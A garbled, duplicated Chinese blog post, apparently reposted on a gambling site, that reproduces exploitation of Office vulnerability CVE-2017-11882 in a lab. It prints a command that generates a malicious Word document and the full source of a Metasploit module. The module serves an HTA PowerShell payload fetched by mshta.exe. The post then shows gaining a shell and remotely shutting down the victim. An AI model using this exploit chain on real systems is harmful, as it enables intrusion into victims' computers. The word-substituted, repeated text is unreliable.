亚州城ca88手机版_亚洲城官方网站|www.yzc889.com

热门关键词: 亚州城ca88手机版,亚洲城官方网站,www.yzc889.com

CVE-2017-118八二尾巴 Msf利用复现

2019-06-08 11:50栏目:亚州城ca88手机版
TAG:

正羊时候接受了推送的漏洞预先警告,在网络检索相关音信看来众多大腕已经付出出生成doc文书档案的脚本和msf的poc,本文记录CVE-2017-11882漏洞在 Msf下的接纳。

 

 

 

Office隐藏1柒年的狐狸尾巴CVE_2017_118八2测试记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参照小说壹:

参照文章二:

 

POC地址:

 

中间环节出现,msf连接数据库退步的场所,化解格局:

 

一.制作标准

 

 

此间搭建两台虚拟机进行测试!

 

测试机配置音信:

 

操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese

 

 

操作系统
Kali 2.1 中文
IP
192.168.1.104

 

首先在kali下安装nginx,可能tomcat应该也是能够的,首先将转移的doc文件放在/usr/share/nginx/html目录下,方便被口诛笔伐的机械获取doc文件。

 

启动nginx服务:systemctl start nginx

 

使用Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c "mshta ;; -o cev2.doc

# 将下载好的狐狸尾巴模块放在msf任意目录下

root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_118捌2.rb的从头到尾的经过如下:

##

# This module requires Metasploit:

# Current source:

##

class MetasploitModule  < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info  = {})

    super(update_info(info,

      'Name' => 'Microsoft Office Payload Delivery',

      'Description' => %q{

        This module generates an command to place within

        a word document, that when executed, will retrieve a HTA payload

        via HTTP from an web server. Currently have not figured out how

        to generate a doc.

      },

      'License' => MSF_LICENSE,

      'Arch' => ARCH_X86,

      'Platform' => 'win',

      'Targets' =>

        [

          ['Automatic', {} ],

        ],

      'DefaultTarget' => 0,

    ))

  end

  def on_request_uri(cli, _request)

    print_status("Delivering payload")

    p = regenerate_payload(cli)

    data = Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_X86,

      'win',

      p.encoded,

      'hta-psh',

      { :arch => ARCH_X86, :platform => 'win '}

    )

    send_response(cli, data, 'Content-Type' => 'application/hta')

  end

  def primer

    url = get_uri

    print_status("Place the following DDE in an MS document:")

    print_line("mshta.exe "#{url}"")

  end

 

接下来,这里在运用msfconsole在此之前,要求先开荒数据库,举例 service postgresql start 

开采数据库之后,进入msfconsole,然后对msf实行伊始化,推行msf init

之后search cve_2017_118八二搜索漏洞模块,然后根据【参谋文章二】进行配置,最后exploit 之后运行对 8080 端口的监听,至于何以是8080端口我也不太精晓啊!

 

2.万事俱备,只欠东风

 

以此时候,只要求在 win七上通过浏览器的到 cve二.doc文档,张开之后,kali中命令行马上展现已经赢获得了连接,

图片 1

图片 2

session命令得到回复,session -i 【id】建设构造连接

shell命令能够得到cmd,实施net user查看用户

图片 3

图片 4

 

三.实验效果

 

透过这一个漏洞,可以胡作非为的实践一些限令,举个例子关机,删除一些文书,搜集一些系统新闻如故那多少个管用的

在桌面新建文件夹

图片 5

长距离关机

图片 6

纵然取获得了命令行,可是透过net user命令能够观察登陆的用户等级是Guest,那就限制了一些亟需权限较高的通令试行!

还要这里win七未有安装杀软,小编不掌握安装杀软之后word文书档案会不会被查杀呢?

 

 

Office隐藏一七年的狐狸尾巴CVE_2017_118八2测试记录

创建时间: 2017/11/25 0:18
作者: CN_Simo
标签: Office漏洞

 

参考作品1:

参照文章贰:

 

POC地址:

 

中间环节出现,msf连接数据库失败的情事,化解措施:

 

壹.构建标准

 

 

那边搭建两台虚拟机进行测试!

 

测试机配置信息:

 

操作系统
Win7_x64 企业版
Office版本
Office 2013
防火墙状态
开启
IP
192.168.1.103
系统语言
Chinese

 

 

操作系统
Kali 2.1 中文
IP
192.168.1.104

 

第三在kali下安装nginx,大概tomcat应该也是能够的,首先将转换的doc文件放在/usr/share/nginx/html目录下,方便被口诛笔伐的机械获取doc文件。

 

启动nginx服务:systemctl start nginx

 

使用Command43b_CVE-2017-11882.py生成doc文件

python Command43b_CVE-2017-11882.py -c "mshta ;; -o cev2.doc

# 将下载好的纰漏模块放在msf放肆目录下

root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

cve_2017_118八二.rb的剧情如下:

##

# This module requires Metasploit:

# Current source:

##

class MetasploitModule  < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info  = {})

    super(update_info(info,

      'Name' => 'Microsoft Office Payload Delivery',

      'Description' => %q{

        This module generates an command to place within

        a word document, that when executed, will retrieve a HTA payload

        via HTTP from an web server. Currently have not figured out how

        to generate a doc.

      },

      'License' => MSF_LICENSE,

      'Arch' => ARCH_X86,

      'Platform' => 'win',

      'Targets' =>

        [

          ['Automatic', {} ],

        ],

      'DefaultTarget' => 0,

    ))

  end

  def on_request_uri(cli, _request)

    print_status("Delivering payload")

    p = regenerate_payload(cli)

    data = Msf::Util::EXE.to_executable_fmt(

      framework,

      ARCH_X86,

      'win',

      p.encoded,

      'hta-psh',

      { :arch => ARCH_X86, :platform => 'win '}

    )

    send_response(cli, data, 'Content-Type' => 'application/hta')

  end

  def primer

    url = get_uri

    print_status("Place the following DDE in an MS document:")

    print_line("mshta.exe "#{url}"")

  end

 

然后,这里在选用msfconsole在此以前,须求先开拓数据库,比方 service postgresql start 

开垦数据库之后,进入msfconsole,然后对msf实行伊始化,实践msf init

之后search cve_2017_1188二搜寻漏洞模块,然后依照【参考文章二】举办布局,最后exploit 之后运行对 8080 端口的监听,至于缘何是8080端口小编也不太领悟啊!

 

二.万事俱备,只欠东风

 

今年,只要求在 win柒上通过浏览器的到 cve二.doc文书档案,张开之后,kali中命令行马上展现已经获得到了连年,

图片 7

图片 8

session命令获得回应,session -i 【id】建设构造连接

shell命令能够拿走cmd,施行net user查看用户

图片 9

图片 10

 

三.推行效果

 

通过那一个漏洞,能够作威作福的实施一些命令,比方关机,删除一些文本,搜聚一些系统音讯依然非常实惠的

在桌面新建文件夹

图片 11

远程关机

图片 12

尽管获得到了命令行,可是通过net user命令能够看出登陆的用户等级是Guest,这就限制了有个别必要权限较高的吩咐施行!

再正是这里win柒未有安装杀软,作者不晓得安装杀软之后word文书档案会不会被查杀呢?

 

 

版权声明:本文由亚州城ca88手机版_亚洲城官方网站|www.yzc889.com发布于亚州城ca88手机版,转载请注明出处:CVE-2017-118八二尾巴 Msf利用复现